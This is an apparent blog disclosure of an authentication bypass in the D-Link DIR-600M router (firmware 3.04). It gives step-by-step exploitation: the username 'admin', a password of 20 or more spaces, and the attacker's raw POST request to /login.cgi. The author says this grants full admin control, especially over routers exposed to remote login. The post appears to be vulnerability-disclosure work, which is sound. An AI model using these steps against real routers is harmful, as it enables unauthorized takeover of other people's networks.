Skip to content

D-Link DIR-600M Wireless N 150 – Authentication Bypass

After Successfully Connected to D-Link DIR-600M Wireless N 150
Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router’s
Admin Panel Just by Feeding Blank Spaces in the password Field.

Its More Dangerous when your Router has a public IP with remote login

For More Details :

Router IP :

Video POC :

2) Proof of Concept

Step 1: Go to
Router Login Page :

Step 2:
Fill username: admin
And in Password Fill more than 20 tims Spaces(” “)

Our Request Is look like below.
—————–ATTACKER REQUEST———————————–

POST /login.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84


——————–END here————————

Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc

Spread the Knowledge
Published inPoC

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.